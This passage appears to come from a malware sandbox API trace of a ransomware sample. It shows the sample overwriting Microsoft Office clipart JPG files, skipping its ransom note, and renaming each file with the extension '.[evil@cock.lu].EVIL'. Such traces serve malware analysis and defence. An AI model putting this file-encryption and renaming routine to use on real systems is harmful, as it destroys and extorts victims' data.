51 [0157.057] __uncaught_exception () returned 0x84b1160800 [0157.057] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.058] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384885.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384885.jpg.[evil@cock.lu].evil")) returned 1 [0157.059] ??_V@YAXPEAX@Z () returned 0x1 [0157.062] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG", dwFileAttributes=0x200) returned 0 [0157.063] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.063] wcsstr (_Str="J0384888.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.063] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG") returned 69 [0157.063] wcscmp (_String1="J0384888.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.063] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0384888.JPG") returned 0x0 [0157.063] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG") returned 0x45 [0157.063] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384888.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.065] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14033, lpOverlapped=0x0) returned 1 [0157.074] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.074] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.074] _errno () returned 0x84b1160840 [0157.074] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.074] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x14040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14040, lpOverlapped=0x0) returned 1 [0157.075] CloseHandle (hObject=0x1a8) returned 1 [0157.075] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.075] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.076] __uncaught_exception () returned 0x84b1160800 [0157.076] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.076] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384888.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384888.jpg.[evil@cock.lu].evil")) returned 1 [0157.078] ??_V@YAXPEAX@Z () returned 0x1 [0157.082] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384888.JPG", dwFileAttributes=0x200) returned 0 [0157.082] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.082] wcsstr (_Str="J0384895.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.082] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG") returned 69 [0157.082] wcscmp (_String1="J0384895.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.082] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0384895.JPG") returned 0x0 [0157.082] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG") returned 0x45 [0157.082] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.085] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd8f6, lpOverlapped=0x0) returned 1 [0157.098] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.098] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.098] _errno () returned 0x84b1160840 [0157.098] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.098] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xd900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd900, lpOverlapped=0x0) returned 1 [0157.098] CloseHandle (hObject=0x1a8) returned 1 [0157.098] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.099] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.099] __uncaught_exception () returned 0x84b1160800 [0157.099] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.099] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384895.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384895.jpg.[evil@cock.lu].evil")) returned 1 [0157.100] ??_V@YAXPEAX@Z () returned 0x1 [0157.103] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG", dwFileAttributes=0x200) returned 0 [0157.103] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.103] wcsstr (_Str="J0384900.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.103] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG") returned 69 [0157.103] wcscmp (_String1="J0384900.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.103] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0384900.JPG") returned 0x0 [0157.103] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG") returned 0x45 [0157.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384900.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.105] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x11780, lpOverlapped=0x0) returned 1 [0157.113] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.113] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.113] _errno () returned 0x84b1160840 [0157.113] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.114] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x117a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x117a0, lpOverlapped=0x0) returned 1 [0157.114] CloseHandle (hObject=0x1a8) returned 1 [0157.114] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.114] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.114] __uncaught_exception () returned 0x84b1160800 [0157.114] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.114] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384900.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384900.jpg.[evil@cock.lu].evil")) returned 1 [0157.115] ??_V@YAXPEAX@Z () returned 0x1 [0157.118] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG", dwFileAttributes=0x200) returned 0 [0157.118] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.118] wcsstr (_Str="J0386120.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.118] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG") returned 69 [0157.118] wcscmp (_String1="J0386120.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.118] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0386120.JPG") returned 0x0 [0157.118] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG") returned 0x45 [0157.118] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386120.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.121] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x787a, lpOverlapped=0x0) returned 1 [0157.128] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.128] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.129] _errno () returned 0x84b1160840 [0157.129] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.129] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x7880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7880, lpOverlapped=0x0) returned 1 [0157.129] CloseHandle (hObject=0x1a8) returned 1 [0157.129] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.129] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.129] __uncaught_exception () returned 0x84b1160800 [0157.129] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.129] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386120.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386120.jpg.[evil@cock.lu].evil")) returned 1 [0157.130] ??_V@YAXPEAX@Z () returned 0x1 [0157.133] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG", dwFileAttributes=0x200) returned 0 [0157.133] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.133] wcsstr (_Str="J0386267.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.133] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG") returned 69 [0157.133] wcscmp (_String1="J0386267.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.133] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0386267.JPG") returned 0x0 [0157.133] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG") returned 0x45 [0157.134] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386267.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.136] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa91e, lpOverlapped=0x0) returned 1 [0157.143] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.143] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.143] _errno () returned 0x84b1160840 [0157.143] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.144] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xa920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa920, lpOverlapped=0x0) returned 1 [0157.144] CloseHandle (hObject=0x1a8) returned 1 [0157.144] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.144] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.144] __uncaught_exception () returned 0x84b1160800 [0157.144] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.144] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386267.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386267.jpg.[evil@cock.lu].evil")) returned 1 [0157.145] ??_V@YAXPEAX@Z () returned 0x1 [0157.148] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG", dwFileAttributes=0x200) returned 0 [0157.148] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.148] wcsstr (_Str="J0386270.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.148] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG") returned 69 [0157.148] wcscmp (_String1="J0386270.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.148] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0386270.JPG") returned 0x0 [0157.148] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG") returned 0x45 [0157.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386270.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.150] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3b43, lpOverlapped=0x0) returned 1 [0157.158] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.158] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.158] _errno () returned 0x84b1160840 [0157.158] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.158] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3b60, lpOverlapped=0x0) returned 1 [0157.158] CloseHandle (hObject=0x1a8) returned 1 [0157.158] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.159] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.159] __uncaught_exception () returned 0x84b1160800 [0157.159] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.159] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386270.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386270.jpg.[evil@cock.lu].evil")) returned 1 [0157.162] ??_V@YAXPEAX@Z () returned 0x1 [0157.165] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG", dwFileAttributes=0x200) returned 0 [0157.165] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.165] wcsstr (_Str="J0386485.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.165] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG") returned 69 [0157.165] wcscmp (_String1="J0386485.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.165] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0386485.JPG") returned 0x0 [0157.165] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG") returned 0x45 [0157.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386485.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.167] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x396a, lpOverlapped=0x0) returned 1 [0157.175] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.175] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.175] _errno () returned 0x84b1160840 [0157.175] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.175] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3980, lpOverlapped=0x0) returned 1 [0157.175] CloseHandle (hObject=0x1a8) returned 1 [0157.175] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.176] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.176] __uncaught_exception () returned 0x84b1160800 [0157.176] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.176] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386485.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386485.jpg.[evil@cock.lu].evil")) returned 1 [0157.177] ??_V@YAXPEAX@Z () returned 0x1 [0157.180] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG", dwFileAttributes=0x200) returned 0 [0157.180] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.180] wcsstr (_Str="J0386764.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.180] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG") returned 69 [0157.180] wcscmp (_String1="J0386764.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.180] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0386764.JPG") returned 0x0 [0157.180] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG") returned 0x45 [0157.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386764.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.182] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x693e, lpOverlapped=0x0) returned 1 [0157.190] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.190] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.190] _errno () returned 0x84b1160840 [0157.190] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.190] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6940, lpOverlapped=0x0) returned 1 [0157.190] CloseHandle (hObject=0x1a8) returned 1 [0157.190] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.191] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.191] __uncaught_exception () returned 0x84b1160800 [0157.191] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.191] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386764.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386764.jpg.[evil@cock.lu].evil")) returned 1 [0157.192] 